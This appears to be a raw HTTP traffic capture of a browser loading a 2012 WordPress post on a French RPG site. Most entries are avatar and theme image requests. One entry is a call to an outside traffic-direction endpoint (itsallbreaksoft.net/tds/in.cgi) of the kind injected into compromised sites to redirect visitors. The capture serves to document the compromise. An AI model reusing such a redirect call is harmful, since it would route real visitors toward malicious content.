GET /avatar/4d4cb0b69848d8f7900c68dd3b49ea1b?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4d4cb0b69848d8f7900c68dd3b49ea1b?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163145
Content-Length: 5419
GET /avatar/a1ff8997105eca627dd27d063bd0f631?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/a1ff8997105eca627dd27d063bd0f631?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F7)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817760
Content-Length: 4279
GET /avatar/116ccead6494c82c5f5b9eea36f6b1a4?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/116ccead6494c82c5f5b9eea36f6b1a4?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3462922498
Content-Length: 4285
GET /avatar/6f8863a943cc9a82f77a0a6b29646d77?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/6f8863a943cc9a82f77a0a6b29646d77?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817763
Content-Length: 3735
GET /avatar/b632ebd013fc1629dcc24806a8f64fbb?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/b632ebd013fc1629dcc24806a8f64fbb?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4679)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 147163148
Content-Length: 5351
GET /avatar/f9f90c01fecc9098082d9ce289d50db1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/f9f90c01fecc9098082d9ce289d50db1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46DE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099254
Content-Length: 4829
GET /avatar/3f7c313866e102131669f2e33f15b328?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3f7c313866e102131669f2e33f15b328?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 251718200
Content-Length: 3914
GET /tds/in.cgi?2&seoref=&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&default_keyword=notdefine HTTP/1.1

Host: itsallbreaksoft.net
GET /tds/in.cgi?2&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: text/html; charset=utf-8
Cache-Control: no-cache
Pragma: no-cache
Content-Encoding: gzip
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP=&quot;CAO PSA OUR&quot;
Set-Cookie: SessionID=a93fc49b-9ccf-4aca-bd91-bbcaa7de4e08; path=/ VisitorID=ff005920-a7fc-4f99-a824-5d985bf27bf3&amp;Exp=11/6/2015 3:50:36 AM; expires=Fri, 06-Nov-2015 11:50:36 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 11:50:35 GMT
Content-Length: 3484
GET /site/wp-content/themes/eGamer/images/bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 02:50:54 GMT
Etag: &quot;18382e7-f19-461fabd63df80&quot;
Accept-Ranges: bytes
Content-Length: 3865
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/search-button.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:34 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 03:13:30 GMT
Etag: &quot;1838312-350-461fb0e36ca80&quot;
Accept-Ranges: bytes
Content-Length: 848
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /avatar/130ffd01253391b2a6d5de2b24a8f16d?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/130ffd01253391b2a6d5de2b24a8f16d?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237453
Content-Length: 5575
GET /avatar/290be01a584057294bee7fef69db3ed2?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/290be01a584057294bee7fef69db3ed2?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FE)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817768
Content-Length: 3845
GET /avatar/4a350e0d946c95a918ce0051fb8d1d58?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/4a350e0d946c95a918ce0051fb8d1d58?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3331995608
Content-Length: 4808
GET /avatar/3d88a8830d11eeb3883e19ec52619353?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/3d88a8830d11eeb3883e19ec52619353?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46FC)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1845331509
Content-Length: 6628
GET /avatar/e89982adeaf29489589f717e8599d103?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/e89982adeaf29489589f717e8599d103?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099257
Content-Length: 4864
GET /avatar/9ed2b3d7841adb7f4fe96ca9c4531d04?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9ed2b3d7841adb7f4fe96ca9c4531d04?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2579099258
Content-Length: 3436
GET /avatar/52d0760e6211e918cadb0f37917f0ce8?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/52d0760e6211e918cadb0f37917f0ce8?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/4667)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448135
Content-Length: 4898
GET /avatar/c5e5417317fa7cec9bc78d644cb279b1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/c5e5417317fa7cec9bc78d644cb279b1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 4276237503
Content-Length: 4964
GET /avatar/62b9e67c6ec128aacde9ee64fbd71c51?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/62b9e67c6ec128aacde9ee64fbd71c51?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E2)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1826817807
Content-Length: 4661
GET /avatar/9a3733dec4183bedbc132111f269227e?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/9a3733dec4183bedbc132111f269227e?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F8)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119007
Content-Length: 5835
GET /avatar/7eec100f82e7007ec1b7c8ac92ac19e1?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/7eec100f82e7007ec1b7c8ac92ac19e1?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E0)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448188
Content-Length: 5385
GET /avatar/fd00b5ee5944bdc8cc2c74837940084f?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/fd00b5ee5944bdc8cc2c74837940084f?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F3)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782448183
Content-Length: 5083
GET /avatar/33bc966e8839d1d054e91a2bd001d455?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/33bc966e8839d1d054e91a2bd001d455?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46F5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1782449552
Content-Length: 6061
GET /avatar/dbf7e37e65ad38e6d19e093e4c61fffc?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/dbf7e37e65ad38e6d19e093e4c61fffc?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46EB)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 1632826829
Content-Length: 3848
GET /avatar/31f9efbe24f3b937dedcb9a65dd66199?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/31f9efbe24f3b937dedcb9a65dd66199?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E1)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119615
Content-Length: 6012
GET /avatar/a48788631c9155faeec1c08f31f997fc?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/a48788631c9155faeec1c08f31f997fc?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
Expires: Tue, 06 Nov 2012 11:55:34 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 2254119711
Content-Length: 4070
GET /avatar/0d85e1f18b6277b6fbbbffbd6201ee5a?s=80&d=wavatar&r=G HTTP/1.1

Host: www.gravatar.com
GET /avatar/0d85e1f18b6277b6fbbbffbd6201ee5a?s=80&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Tue, 06 Nov 2012 11:50:34 GMT
